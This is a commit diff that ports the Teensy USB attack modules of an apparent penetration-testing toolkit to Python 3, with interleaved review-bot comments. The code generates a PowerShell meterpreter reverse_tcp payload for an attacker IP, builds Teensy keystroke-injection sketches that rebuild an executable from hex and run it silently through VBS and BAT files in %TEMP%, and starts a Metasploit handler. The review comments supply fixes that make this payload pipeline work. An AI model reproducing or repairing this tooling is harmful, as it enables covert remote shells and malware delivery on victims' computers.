pep8 & python3 for teensy

This commit is contained in:
Ryan Jarvis 2016-07-28 15:17:55 -07:00
parent a93d2c8e68
commit 129a6bf5ad
4 changed files with 452 additions and 297 deletions



@ -1,8 +1,19 @@
#!/usr/bin/python
import pexpect
from src.core.setcore import *
# coding=utf-8
import os
import time
import pexpect
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
@ -13,45 +24,41 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload)
ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
filewrite = open(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite:
filewrite.write(shellcode)
time.sleep(3)
fileopen = open(setdir + "/x86.powershell", "r")
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
pass
# read in x amount of bytes
data_read = int(50)
# read in x amount of bytes
data_read = int(50)
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "":
break
output_variable += "const char RevShell_%s[] PROGMEM = '%s';\n" % (
counter, reading_encoded)
counter = counter + 1
counter = 0
while True:
reading_encoded = fileopen.read(data_read).rstrip()
if not reading_encoded:
break
output_variable += "const char RevShell_{}[] PROGMEM = '{}';\n".format(counter, reading_encoded)
counter += 1
rev_counter = 0
output_variable += "const char exploit[] PROGMEM = {\n"
while rev_counter != counter:
output_variable += "RevShell_%s" % rev_counter
rev_counter = rev_counter + 1
output_variable += "RevShell_{}".format(rev_counter)
rev_counter += 1
if rev_counter == counter:
output_variable += "};\n"
if rev_counter != counter:
else:
output_variable += ",\n"
teensy = output_variable
@ -142,36 +149,39 @@ Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print("[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir))
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
filewrite = open(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
print("[*] Payload has been extracted. Copying file to {}".format(os.path.join(core.setdir, "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite:
filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
else:
port = input("Enter the port to connect back on: ")
filewrite = open(setdir + "/metasploit.answers", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload, ipaddr, port))
filewrite.close()
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite:
filewrite.write("use multi/handler\n"
"set payload {}\n"
"set LHOST {}\n"
"set LPORT {}\n"
"set AutoRunScript post/windows/manage/smart_migrate\n"
"exploit -j".format(payload, ipaddr, port))
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn(
"%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(), setdir))
child = pexpect.spawn("{} -r {}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "metasploit.answers")))
child.interact()
except:
pass
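Review bot: The mode argument is passed to os.path.join instead of open at `with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite:`, so this opens `<setdir>/x86.powershell/w` for reading and raises instead of writing the shellcode; the same slip is in the last hunk at "/reports/teensy.pde" and "/metasploit.answers", where the leading slash additionally makes os.path.join discard core.setdir (writefile in the third file has the same leading-slash problem with `"/reports/teensy_{}.pde"` and therefore writes somewhere other than the path its status message reports). Those three should read `with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:`, `with open(os.path.join(core.setdir, "reports", "teensy.pde"), "w") as filewrite:` and `with open(os.path.join(core.setdir, "metasploit.answers"), "w") as filewrite:`. In the same hunk `with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: pass` closes the file immediately, so the `fileopen.read(data_read)` loop below runs on a closed file and raises ValueError; the read loop has to move inside the with block, as below.
```python
with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
    filewrite.write(shellcode)
# … unchanged: time.sleep, data_read, output_variable header, counter = 0 …
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
    while True:
        reading_encoded = fileopen.read(data_read).rstrip()
        if not reading_encoded:
            break
        output_variable += "const char RevShell_{}[] PROGMEM = '{}';\n".format(counter, reading_encoded)
        counter += 1
# … unchanged: exploit[] array assembly …
```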


@ -1,15 +1,14 @@
#!/usr/bin/python
import binascii
import base64
import sys
import binascii
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
import src.core.setcore as core
# from src.core.setcore import *
# from src.core.dictionaries import *
# from src.core.menu.text import *
##########################################################################
#
@ -23,6 +22,13 @@ from src.core.menu.text import *
##########################################################################
##########################################################################
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# print main stuff for the application
print("""
********************************************************************
@ -48,43 +54,45 @@ print("""
enabled.\n""")
# grab the path and filename from user
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
print_warning(
"Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status(
"Converting the executable to a hexadecimal form to be converted later...")
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
fileopen = open(path, "rb")
data = fileopen.read()
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
filewrite = open("converts.txt", "w")
filewrite.write(data)
print("[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard.")
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\nReading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = generate_random_string(8, 15) + ".txt"
random_filename = core.generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
powershell_command = ("$s=gc \"$HOME\\AppData\\Local\\Temp\\{random_filename}\";"
"$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');"
"$b=new-object byte[] $($s.Length/2);"
"0..$($b.Length-1)|%{{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)}};"
"[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\{random_filename}.exe\",$b)".format(random_filename=random_filename))
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
# there is an odd bug with python unicode, traditional unicode inserts a
# null byte after each character typically.. python does not so the encoded
# command becomes corrupt in order to get around this a null byte is pushed
# to each string value to fix this and make the encodedcommand work properly
#
##########################################################################
@ -101,9 +109,9 @@ powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
# vbs filename
vbs = generate_random_string(10, 15) + ".vbs"
vbs = core.generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10, 15) + ".bat"
bat = core.generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -118,9 +126,9 @@ void setup()
{
BlinkFast(2);
delay(5000);
CommandAtRunBar("cmd /c echo 0 > %%TEMP%%\\\\%s");
CommandAtRunBar("cmd /c echo 0 > %TEMP%\\\\{random_filename}");
delay(750);
CommandAtRunBar("notepad %%TEMP%%\\\\%s");
CommandAtRunBar("notepad %TEMP%\\\\{random_filename}");
delay(1000);
// Delete the 0
PRES(KEY_DELETE);
@ -132,11 +140,11 @@ void setup()
pinMode(10, OUTPUT);
// see if the card is present and can be initialized:
if (!SD.begin(chipSelect)) {
if (!SD.begin(chipSelect)) {{
Keyboard.println("Card failed, or not present");
// don't do anything more:
return;
}
}}
// open the file. note that only one file can be open at a time,
// so you have to close this one before opening another.
@ -147,15 +155,15 @@ void setup()
File dataFile = SD.open("converts.txt");
if (dataFile) {
fileSize = dataFile.size();
for (filePos = 0; filePos <= fileSize; filePos++) {
for (filePos = 0; filePos <= fileSize; filePos++) {{
Keyboard.print(dataFile.read(),BYTE);
delay(10);
}
}}
dataFile.close();
}
else {
}}
else {{
Keyboard.println("error opening converts.txt");
}
}}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
delay(5000);
CtrlS();
@ -166,45 +174,45 @@ void setup()
// run through cmd
CommandAtRunBar("cmd");
delay(1000);
Keyboard.println("powershell -EncodedCommand %s");
Keyboard.println("powershell -EncodedCommand {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %%TEMP%%\\\\%s");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%%TEMP%%\\\\%s\\" ^& Chr(34), 0 >> %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = Nothing >> %%TEMP%%\\\\%s");
Keyboard.println("echo %%TEMP%%\\\\%s.exe > %%TEMP%%\\\\%s");
Keyboard.println("wscript %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
Keyboard.println("echo Set WshShell = Nothing >> %TEMP%\\\\{vbs}");
Keyboard.println("echo %TEMP%\\\\{random_filename}.exe > %TEMP%\\\\{bat}");
Keyboard.println("wscript %TEMP%\\\\{vbs}");
delay(1000);
Keyboard.println("exit");
}
void loop () {}
}}
void loop () {{}}
void BlinkFast(int BlinkRate){
int BlinkCounter=0;
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){{
digitalWrite(ledPin, HIGH);
delay(80);
digitalWrite(ledPin, LOW);
delay(80);
}
}
void AltF4(){
}}
}}
void AltF4(){{
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_F4);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
void CtrlS(){
}}
void CtrlS(){{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
}}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
void CommandAtRunBar(char *SomeCommand){{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
@ -217,24 +225,21 @@ void CommandAtRunBar(char *SomeCommand){
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void PRES(int KeyCode){
}}
void PRES(int KeyCode){{
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, bat, vbs))
}}
""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
subprocess.Popen("rm {} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.pde")
# write the teensy.pde file out
filewrite = open("teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
with open("teensy.pde", "w") as filewrite:
# write the teensy.pde file out
filewrite.write(output_variable)
print("""
Instructions:
@ -246,4 +251,4 @@ on.
Happy hacking.
""")
return_continue()
core.return_continue()
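Review bot: On Python 3 `binascii.hexlify(data)` returns bytes, so `filewrite.write(data)` into the text-mode `open("converts.txt", "w")` raises TypeError; decode once at the boundary with `data = binascii.hexlify(data).decode("ascii")`. The same bytes/str split presumably affects the context line `powershell_command = base64.b64encode(powershell_command)`: on Python 3 its result is bytes, and `{powershell_command}` in the sketch template would then embed a `b'...'` repr instead of the base64 text. The construction of the encoded command lies outside the hunk, so that part is worth confirming there and, if needed, following with `.decode("ascii")`.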


@ -1,34 +1,44 @@
#!/usr/bin/env python
# coding=utf-8
############################
#
# Teensy HID Attack Vector
#
############################
import sys
import re
import os
import subprocess
import datetime
from src.core.setcore import *
import os
import re
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# pull metasploit path
msf_path = meta_path()
msf_path = core.meta_path()
# check operating system
operating_system = check_os()
operating_system = core.check_os()
now = datetime.datetime.today()
if operating_system != "windows":
import pexpect
# check to see if setdir is created
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
definepath = os.getcwd()
# define if use apache or not
apache = 0
apache = False
# open set_config here
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
with open("/etc/setoolkit/set.config") as fileopen:
apache_check = fileopen.readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
@ -43,49 +53,50 @@ for line in apache_check:
if match2:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
apache = True
# grab info from config file
fileopen = open(setdir + "/teensy", "r")
counter = 0
payload_counter = 0
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter = counter + 1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
with open(os.path.join(core.setdir, "teensy")) as fileopen:
counter = 0
payload_counter = 0
choice = None
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter += 1
if not os.path.isfile(setdir + "/teensy"):
print_error(
"FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
if choice != "14":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir, "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set()
def writefile(filename, now):
fileopen = open("src/teensy/%s" % filename, "r")
filewrite = open(setdir + "/reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
with open(os.path.join("src/teensy", filename)) as fileopen, \
open(os.path.join(core.setdir, "/reports/teensy_{}.pde".format(now)), "w") as filewrite:
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
filewrite.write(line)
filewrite.write(line)
filewrite.close()
# powershell downloader
if choice == "1":
@ -116,32 +127,44 @@ if choice == "13":
payload_counter = 0
# save our stuff here
print(bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir, now) + bcolors.ENDC)
print(bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC)
print(bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC)
print(core.bcolors.BLUE +
"\n[*] PDE file created. You can get it under '{}'".format(os.path.join(core.setdir, "reports", "teensy_{}.pde".format(now))) +
core.bcolors.ENDC)
print(core.bcolors.GREEN +
'[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' +
core.bcolors.ENDC)
print(core.bcolors.RED +
"\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" +
core.bcolors.ENDC)
pause = input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir), shell=True).wait()
webclone_path = os.path.join(core.setdir, "web_clone")
metasploit_exec_path = os.path.join(core.setdir, "msf.exe")
if not apache:
subprocess.Popen("mkdir {};"
"cp {} {} 1> /dev/null 2> /dev/null".format(webclone_path,
metasploit_exec_path,
os.path.join(webclone_path, "x.exe")),
shell=True).wait()
if operating_system != "windows":
child = pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp %s/msf.exe %s/x.exe" %
(setdir, apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
print(bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC)
else:
subprocess.Popen("cp {} %s/x.exe".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try:
if operating_system != "windows":
child1 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path, setdir))
child1 = pexpect.spawn("{} -r {}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, "meta_config")))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
if not apache:
child.close()
child1.close()
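Review bot: The apache branch `subprocess.Popen("cp {} %s/x.exe".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()` mixes a `%s` placeholder with str.format, so the second argument is never substituted and the shell receives the literal destination `%s/x.exe`; it also drops the old target `apache_path`, which the config loop earlier in this file sets when APACHE_DIRECTORY is configured. It should read `subprocess.Popen("cp {} {}".format(metasploit_exec_path, os.path.join(apache_path, "x.exe")), shell=True).wait()`. In the first hunk, `import datetime` is shown only once and the new import list is os/re/subprocess/core; if that line was removed rather than kept as context (the rendered page does not make this certain), `now = datetime.datetime.today()` fails with NameError and the import needs to be restored.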